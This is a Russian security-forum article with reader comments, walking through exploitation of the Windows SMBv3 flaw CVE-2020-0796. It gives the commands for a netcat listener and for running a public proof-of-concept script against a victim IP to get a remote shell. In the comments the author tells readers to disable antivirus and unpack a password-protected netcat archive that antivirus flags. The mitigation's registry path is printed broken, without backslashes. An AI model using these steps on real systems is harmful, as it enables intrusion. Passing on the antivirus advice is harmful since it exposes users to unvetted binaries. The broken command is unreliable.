• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья История об одной CVE

1606491091400.png

Введение


Приветствую всех, кто читает эту статью. Это время я бы хотел уделить одной очень интересной уязвимости на мой взгляд. Была открыта она еще в начале наших изоляционных дней. Когда все проблемы оставались в Китае :) Но сейчас не об этом. Под угрозу было поставлено достаточное количество устройств и решил ее рассмотреть так как с помощью нее возможно было распространение червя, похожего по архитектуре на WannaCry. Теперь я разбудил ваш интерес? Тогда давайте разберемся, что к чему.

Удаленное выполнение кода POC


Именно такое описание получила уязвимость CVE-2020-0796. Давайте взглянем на краткую сводку нашей проблемы. А именно:

1. Дата появления: 10 марта 2020 года.
2. Уязвимые системы: Windows 10 с версии 1903 до 1909.
3. Тип: RCE (удаленное выполнения вредоносного кода).

Теперь идем к тому, как это все работает. У данной уязвимости имеется свой эксплоит, но для начала взглянем на схему работы, что я делал специально для статьи:

1606490839500.jpeg


Попытался все сделать моментально понятно. Из "схемы" выше можно сделать вывод о том, что у нас происходит создание защищенного соединения от пользователя при помощи Netcat на порту 4321. Так же разберем флаги, что используются для создания:

-l режим прослушивания.
-v вывод информации о процессе работы.
-p {номер} локальное число для прослушивания.

Сама же уязвимость связанна с тем, что что протокол Microsoft Server Message Block версии 3.1.1 обрабатывает определенные запросы с помощью которых злоумышленник может получить удаленное управления системой. От теории к практике, попытаемся эксплуатировать нашу уязвимость.

Эксплуатация CVE


Сам эксплоит, что нам понадобиться размещен как всегда на Github. Скачиваем его и разархивируем. Для машины жертвы нужно запустить bat-файл:

1606489708300.jpeg


После устанавливаем сам Netcat, короткая инструкция ниже.

Windows:
1. Скачиваем программу [ ]
2. Перемещаем ее на Локальный Диск C.
3. Открываем консоль и выполняем код:
cd C:\NetCat
start nc.exe

Linux:
1. Открываем консоль.
2. Выполняем код: apt-get install ncat

Теперь нам нужно запустить слушателя для приема управления системой. Для этого пишем:

ncat -lvp 1234 ([I]можно любой порт[/I])

На Windows запускаете ncat и в консоле пишете: -lvp 1234 (это все на машине хакера).

Еще пару шагов и мы получим полный контроль. Переходим на уязвимую машину. Закидываем папку CVE-2020-0796-RCE-POC-master на локальный диск и переходим в нее через консоль. Остается дело за малым. Подключаемся, с помощью команды:

SMBleedingGhost.py <IP жертвы> <IP атакующего> <порт указанный в ncat>

И получаем сессию на устройстве, где мы запустили слушателя. Все очень запутано, но мы добились своего. Если конечно вы взяли уязвимое устройство. Для защиты от подобного рода уязвимости было рекомендовано создать ключ ниже в реестре при помощи PowerShell скрипта:

Set-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetServicesLanmanServerParameters" DisableCompression -Type DWORD -Value 1 -Force

Так же стоит закрыть доступ к 445 порту. Теперь идем к завершению.

Вывод

В данной статье я постарался максимально понятно рассказать об одной из нашумевших CVE. Так же не отрицаю наличие ошибок и если вы нашли недочет/не верную трактовку просьба сообщить в комментариях. Я всегда приветствую какую либо активность под статьями. В остальном надеюсь данный материал принес вам пользу.
 
T

to_0day

пасс какой к неткату?
Если не ошибаюсь, то он остался: hackerlife. Чтобы лишний раз не перезаливать я оставил тот, что однажды куда то кидал. Антивирусы могут ругаться, но файл чист, протестирован на моей системе.
 
09.11.2017
258
261
BIT
5
Если не ошибаюсь, то он остался: hackerlife. Чтобы лишний раз не перезаливать я оставил тот, что однажды куда то кидал. Антивирусы могут ругаться, но файл чист, протестирован на моей системе.пишет не верный пароль

вбил пароль не верный пароль и усё(((
 
T

to_0day

вбил пароль не верный пароль и усё(((
Сегодня перезалью с той же ссылкой если получиться

вбил пароль не верный пароль и усё(((
Отключай антивирусник перед работой. Пароль на архив hackerlife. При распаковке переходишь в директорию и пишешь: nc -lvp 1234
Если хочешь более свежую версию, то . Я только что файл свой проверил и прекрасно работает. Более подробнее и проще, то можешь закинуть папку NetCat на диск C, открыть консольное окно (Win + R, вводишь команду: cmd). Потом пишешь: cd C:\NetCat и запускаешь (для удобства можно переименовать nc.exe в ncat.exe, тогда команда будет из статьи работать). Приятной работы ;)
 
  • Нравится
Реакции: Дядюшка Рик

UziUser

Green Team
10.07.2016
20
5
BIT
0
Норм статья. Будем практиковать в локалке.
История "об одной".. мог бы лаконично: "История одной CVE"
 
  • Нравится
Реакции: to_0day

PavelLeven2

Green Team
16.11.2020
18
11
BIT
0
интересная статья, все коротко и понятно)
спасибо, буду пробовать)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!